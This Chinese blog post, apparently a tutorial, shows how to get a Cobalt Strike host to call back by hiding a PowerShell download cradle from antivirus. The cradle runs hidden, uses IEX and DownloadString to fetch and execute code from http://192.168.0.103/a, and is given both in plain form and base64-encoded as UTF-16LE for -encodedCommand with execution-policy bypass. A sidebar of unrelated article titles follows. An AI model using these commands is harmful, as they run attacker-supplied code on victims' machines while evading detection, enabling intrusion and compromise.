当前位置:网站首页>powershell cs-UTF-16LE编码上线
powershell cs-UTF-16LE编码上线
2022-07-07 09:59:00 【kuxing_admin】
0x01前言
当我们要上线主机的时候,可能会因为你的代码含有木马字符串,导致无法上线
0x02问题
1、 例子
powershell.exe -exec bypass -encodedCommand ZQBjAGgAbwAgACIAMQAyADMAIgA=
2、原句子powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.103:80/a'))"
3、UTF-16LE编码后 (在powershell上能直接执行)
powershell.exe -w hidden -exec bypass -encodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMAAuADEAMAAzADoAOAAwAC8AYQAnACkAKQA=
主机上线
边栏推荐
- 18 basic introduction to divider separator component of fleet tutorial (tutorial includes source code)
- What is high cohesion and low coupling?
- Use references
- Nuclear boat (I): when "male mothers" come into reality, can the biotechnology revolution liberate women?
- 正在運行的Kubernetes集群想要調整Pod的網段地址
- CMU15445 (Fall 2019) 之 Project#2 - Hash Table 详解
- Design intelligent weighing system based on Huawei cloud IOT (STM32)
- Apprentissage comparatif non supervisé des caractéristiques visuelles par les assignations de groupes de contrôle
- STM32 entry development uses IIC hardware timing to read and write AT24C08 (EEPROM)
- Steps of redis installation and self startup configuration under CentOS system
猜你喜欢
Rationaldmis2022 advanced programming macro program
Learning notes | data Xiaobai uses dataease to make a large data screen
【系统设计】指标监控和告警系统
What development models did you know during the interview? Just read this one
《通信软件开发与应用》课程结业报告
SwiftUI 教程之如何在 2 秒内实现自动滚动功能
相机标定(1): 单目相机标定及张正友标定基本原理
Summed up 200 Classic machine learning interview questions (with reference answers)
Explore cloud database of cloud services together
禁锢自己的因素,原来有这么多
随机推荐
Rationaldmis2022 advanced programming macro program
大佬们有没有人遇到过 flink oracle cdc,读取一个没有更新操作的表,隔十几秒就重复读取
Flet教程之 14 ListTile 基础入门(教程含源码)
Audit migration
Use references
【问道】编译原理
Rationaldmis2022 array workpiece measurement
[filter tracking] comparison between EKF and UKF based on MATLAB extended Kalman filter [including Matlab source code 1933]
【滤波跟踪】基于matlab扩展卡尔曼滤波EKF和无迹卡尔曼滤波UKF比较【含Matlab源码 1933期】
Nuclear boat (I): when "male mothers" come into reality, can the biotechnology revolution liberate women?
深度学习秋招面试题集锦(一)
audit 移植
Swiftui swift internal skill how to perform automatic trigonometric function calculation in swift
聊聊SOC启动(十一) 内核初始化
How to write test cases for test coupons?
R language Visual facet chart, hypothesis test, multivariable grouping t-test, visual multivariable grouping faceting boxplot, and add significance levels and jitter points
SwiftUI Swift 内功之 Swift 中使用不透明类型的 5 个技巧
In SQL, I want to set foreign keys. Why is this problem
Onedns helps college industry network security
【最短路】ACwing 1127. 香甜的黄油(堆优化的dijsktra或spfa)